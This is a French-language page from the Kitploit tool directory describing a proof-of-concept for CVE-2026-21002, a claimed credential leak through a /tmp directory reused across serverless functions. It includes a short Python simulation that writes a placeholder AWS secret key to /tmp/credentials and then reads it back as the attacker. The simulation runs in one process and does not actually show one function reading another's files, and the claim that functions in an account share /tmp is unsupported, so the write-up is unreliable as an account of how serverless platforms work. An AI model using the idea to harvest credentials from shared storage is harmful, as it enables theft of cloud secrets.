Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — Exploit PoC pour la fuite d'identifiants au démarrage à froid serverless CVE-2026-21002, démontrant comment les répertoires /tmp de Lambda réutilisés exposent les secrets AWS à d'autres fonctions. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Sécurité de l'Infrastructure CloudAnalyse des VulnérabilitésExploitationSécurité ServerlessExfiltration de DonnéesSécurité CloudApprentissage et Éducation
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

Exploit PoC pour la fuite d'identifiants au démarrage à froid serverless CVE-2026-21002, démontrant comment les répertoires /tmp de Lambda réutilisés exposent les secrets AWS à d'autres fonctions.

Voir le dépôt
9il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-21002 – Fuite d'identifiants au démarrage à froid serverless via /tmp réutilisé

Code du programme (simulation Python AWS Lambda)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Fuite d'identifiants au démarrage à froid serverless

Severity: Critical

Aperçu

Les plateformes serverless réutilisent l'environnement d'exécution (y compris /tmp) entre les invocations de fonctions et même entre différentes fonctions du même compte. La fonction d'un attaquant peut lire les fichiers sensibles laissés dans /tmp par une autre fonction après un démarrage à froid, ce qui conduit au vol d'identifiants.

Détails de la vulnérabilité

  • Type : Divulgation d'informations / Fuite inter-fonctions
  • Impact : Compromission d'identifiants, mouvement latéral.
  • Cause racine : Le répertoire /tmp est partagé entre les conteneurs chauds sans isolation entre les fonctions.

Démonstration de l'exploit

Exécutez la simulation :

root@kitploit:~
python lambda_func_sim.py

L'attaquant lit l'AWS_SECRET_ACCESS_KEY laissée par la fonction victime.

Télécharger l’outil